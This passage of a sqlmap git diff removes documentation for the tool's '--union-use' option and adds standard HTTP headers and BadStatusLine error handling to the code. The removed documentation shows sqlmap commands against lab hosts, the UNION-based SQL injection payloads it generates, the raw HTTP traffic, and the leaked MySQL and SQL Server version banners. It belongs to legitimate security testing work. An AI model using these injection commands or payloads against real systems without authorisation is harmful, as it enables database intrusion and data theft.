-valid union:    'http://192.168.1.121:80/sqlmap/pgsql/get_str.php?id=1' UNION ALL SELECT 
-NULL, NULL, NULL-- AND 'QOAtA'='QOAtA&amp;cat=2'
-</verb></tscreen>
-
-<p>
-As you can see, the target URL parameter <tt>id</tt> might be also
-affected by an inband SQL injection.
-In case this vulnerability is exploitable it is strongly recommended to
-use it.
-
-<sect2>Use the UNION SELECT query SQL injection
-
-<p>
-Option: <tt>--union-use</tt>
-
-<p>
-Providing the <tt>--union-use</tt> parameter, sqlmap will first test if
-the target URL is affected by an <bf>inband SQL injection</bf>
-(<tt>--union-test</tt>) vulnerability then, in case it is vulnerable and
-exploitable, it will trigger this vulnerability to retrieve the output of
-the <tt>SELECT</tt> queries.
-
-<p>
-Example on a <bf>Microsoft SQL Server 2000 Service Pack 0</bf> target:
-
-<tscreen><verb>
-$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1&amp;cat=2" -v 1 \
-  --union-use --banner
-
-[...]
-back-end DBMS:	Microsoft SQL Server 2000
-
-[hh:mm:42] [INFO] fetching banner
-[hh:mm:42] [INFO] testing inband sql injection on parameter 'id'
-[hh:mm:42] [INFO] the target url could be affected by an inband sql injection vulnerability
-[hh:mm:42] [INFO] confirming inband sql injection on parameter 'id'
-[hh:mm:42] [INFO] the target url is affected by an exploitable inband sql injection 
-vulnerability
-[hh:mm:42] [INFO] query:  UNION ALL SELECT NULL, (CHAR(110)+CHAR(83)+CHAR(68)+CHAR(80)+
-CHAR(84)+CHAR(70))+ISNULL(CAST(@@VERSION AS VARCHAR(8000)), (CHAR(32)))+(CHAR(70)+CHAR(82)+
-CHAR(100)+CHAR(106)+CHAR(72)+CHAR(75)), NULL-- AND 5204=5204
-[hh:mm:42] [INFO] performed 3 queries in 0 seconds
-banner:
----
-Microsoft SQL Server  2000 - 8.00.194 (Intel X86) 
-	Aug  6 2000 00:57:48 
-	Copyright (c) 1988-2000 Microsoft Corporation
-	Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
----
-</verb></tscreen>
-
-<p>
-As you can see, the vulnerable parameter (<tt>id</tt>) is affected by both
-blind SQL injection and exploitable inband SQL injection vulnerabilities.
-
-<p>
-Example on a <bf>MySQL 5.0.51</bf> target:
-
-<tscreen><verb>
-$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&amp;cat=2" -v 5 \
-  --union-use --banner
-
-[...]
-[hh:mm:25] [INFO] the target url is affected by an exploitable inband sql injection 
-vulnerability
-[hh:mm:25] [INFO] query:  UNION ALL SELECT NULL, CONCAT(CHAR(98,108,76,79,106,78),
-IFNULL(CAST(VERSION() AS CHAR(10000)), CHAR(32)),CHAR(122,110,105,89,121,65)), NULL-- 
-AND 6043=6043
-[hh:mm:25] [TRAFFIC OUT] HTTP request:
-GET /sqlmap/mysql/get_int.php?id=1%20UNION%20ALL%20SELECT%20NULL%2C%20CONCAT%28CHAR%2898
-%2C108%2C76%2C79%2C106%2C78%29%2CIFNULL%28CAST%28VERSION%28%29%20AS%20CHAR%2810000%29%29
-%2C%20CHAR%2832%29%29%2CCHAR%28122%2C110%2C105%2C89%2C121%2C65%29%29%2C%20NULL--%20AND%2
-06043=6043&amp;cat=2 HTTP/1.1
-Host: 192.168.1.121:80
-User-agent: sqlmap/0.6.3 (http://sqlmap.sourceforge.net)
-Connection: close
-
-[hh:mm:25] [TRAFFIC IN] HTTP response (OK - 200):
-Date: Mon, 28 Jul 2008 22:34:25 GMT
-Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.2 with Suhosin-Patch mod_ssl/2.2.8 
-OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
-X-Powered-By: PHP/5.2.4-2ubuntu5.2
-Content-Length: 194
-Connection: close
-Content-Type: text/html
-
-&lt;html&gt;&lt;body&gt;
-&lt;b&gt;SQL results:&lt;/b&gt;
-&lt;table border="1"&gt;
-&lt;tr&gt;&lt;td&gt;1&lt;/td&gt;&lt;td&gt;luther&lt;/td&gt;&lt;td&gt;blissett&lt;/td&gt;&lt;/tr&gt;
-&lt;tr&gt;&lt;td&gt;&lt;/td&gt;&lt;td&gt;blLOjN5.0.51a-3ubuntu5.2zniYyA&lt;/td&gt;&lt;td&gt;&lt;/td&gt;&lt;/tr&gt;
-&lt;/table&gt;
-&lt;/body&gt;&lt;/html&gt;
-
-[hh:mm:25] [INFO] performed 3 queries in 0 seconds
-banner:    '5.0.51a-3ubuntu5.2'
-</verb></tscreen>
-
-<p>
-As you can see, the MySQL <tt>version()</tt> function (banner) output is
-nested (inband) within the HTTP response page, this makes the inband SQL
-injection exploitable.
-
-
 <sect2>Estimated time of arrival
 
 <p>
diff --git a/lib/core/option.py b/lib/core/option.py
index f60bbc71e..a15cfdbcd 100644
--- a/lib/core/option.py
+++ b/lib/core/option.py
@@ -278,6 +278,13 @@ def __setHTTPMethod():
         conf.method = "GET"
 
 
+def __setHTTPStandardHeaders():
+    conf.httpHeaders.append(("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"))
+    conf.httpHeaders.append(("Accept-Language", "en-us,en;q=0.5"))
+    conf.httpHeaders.append(("Accept-Encoding", "gzip,deflate"))
+    conf.httpHeaders.append(("Accept-Charset", "ISO-8859-15,utf-8;q=0.7,*;q=0.7"))
+
+
 def __defaultHTTPUserAgent():
     """
     @return: default sqlmap HTTP User-Agent header
@@ -566,6 +573,7 @@ def init(inputOptions=advancedDict()):
     __setHTTPCookies()
     __setHTTPReferer()
     __setHTTPUserAgent()
+    __setHTTPStandardHeaders()
     __setHTTPMethod()
     __setHTTPAuthentication()
     __setHTTPProxy()
diff --git a/lib/request/connect.py b/lib/request/connect.py
index e31aaeac0..90c2c84a7 100644
--- a/lib/request/connect.py
+++ b/lib/request/connect.py
@@ -24,6 +24,7 @@ Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 
 
 
+import httplib
 import md5
 import re
 import socket
@@ -182,6 +183,19 @@ class Connect:
                 warnMsg += " or proxy"
                 raise sqlmapConnectionException, warnMsg
 
+        except httplib.BadStatusLine, _:
+            warnMsg = "the target url responded with an unknown HTTP "
+            warnMsg += "status code, try to force the HTTP User-Agent "
+            warnMsg += "header with option --user-agent or -a"
+
+            if conf.googleDork:
+                warnMsg += ", skipping to next url"
+                logger.warn(warnMsg)
+
+                return None
+            else:
+                raise sqlmapConnectionException, warnMsg
+
         parsePage(page)
         responseMsg += "(%s - %d):\n" % (status, code)